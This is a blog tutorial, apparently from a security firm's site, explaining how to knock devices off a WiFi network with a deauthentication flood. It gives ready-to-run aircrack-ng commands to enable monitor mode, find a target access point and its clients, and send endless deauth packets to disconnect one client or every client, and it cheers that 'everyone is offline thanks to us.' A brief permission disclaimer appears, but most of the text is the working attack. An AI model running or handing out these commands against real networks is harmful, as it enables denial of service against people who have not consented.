WiFi Jamming: A DOS/Deauth Attack

WiFi jamming: a ‘DOS/Deauth attack’ - Securium solutions

WiFi jamming allows us to take rogue stations/clients off our network. Software does this using de-authentication attack where it will flood the target access-point (AP) with deauth packets. This will cause the target AP to disconnect the clients from the network. It doesn’t involve the actual jamming of radio frequencies, which can be done using tool called HackRF.

Warning: This hack/trick is only for educational purpose. Do this attack on your own network or where you have permission to do so.

Requirements: Kali linux, wifi adapter which can do packet injection and operate in monitor mode like ALFA AWUS036NEH, TP-LINK TL-WN722N.

Now, lets get things rolling.

Enable monitor mode:

Run command “iwconfig” or “airmon-ng” to see available wifi interfaces and choose accordingly.

To enable monitor mode on the interface, run “airmon-ng start wlan0“. If we see any processes which interfere with our attack, we kill them with “airmon-ng check kill“.

Also, ‘wlan0mon’ is my monitor mode interface name.

Find the AP:

airodump-ng wlan0mon” scans for all nearby networks.

I will select the AP with name (ESSID) ‘second floor’ and MAC(BSSID) ’04:95:E6:30:21:90′ operating on channel 5.

FACT: We can use the power(PWR) value to locate an access point (AP), the higher the value (-40 > -68),the closer we are to the AP.

Find clients of target:

airodump-ng -c 5 –bssid 04:95:E6:30:21:90 wlan0mon” This will give me the clients of our target AP.

We can see above the clients and their MAC addresses.

Now comes the interesting part, we can either disconnect/de-authenticate 1 device or all devices. Lets do both.

De-authenticate 1 client:

aireplay-ng -0 0 -a 04:95:E6:30:21:90 -c 38:E6:0A:D2:A4:F4 wlan0mon

Here, -0 0 makes use of deauth attack(type 0) for duration of 0(infinity)

      -a is our AP

      -c is victim client

Check your victim’s device, he’s device can’t connect to this AP (wifi) for as long as we want, simply press “CTRL + c” to stop the attack.

Deauthenticate all clients:

aireplay-ng -0 0 -a 04:95:E6:30:21:90 wlan0mon

Same command as previous but without specifying a target, hence everyone is the target. Everyone is offline thanks to us.

Now, I will revert back to managed mode from monitor mode, else I can’t connect to any WIFI to access internet.


Finally, with this we have completed our small trick. This is a very simple yet a super effective attack of wifi jamming. It’s almost impossible to defend from this attack and the attacker doesn’t even have to know the AP (wifi) password.

Note: We can also make a portable version of this jammer by using a raspberry pi with wifi adapter or using ESP8266 which has an inbuilt wifi.

Happy Hacking !!!

Stick With Our Blog: Click Here


Vishal Thakur

Network Security Intern

Table of Contents

Social Media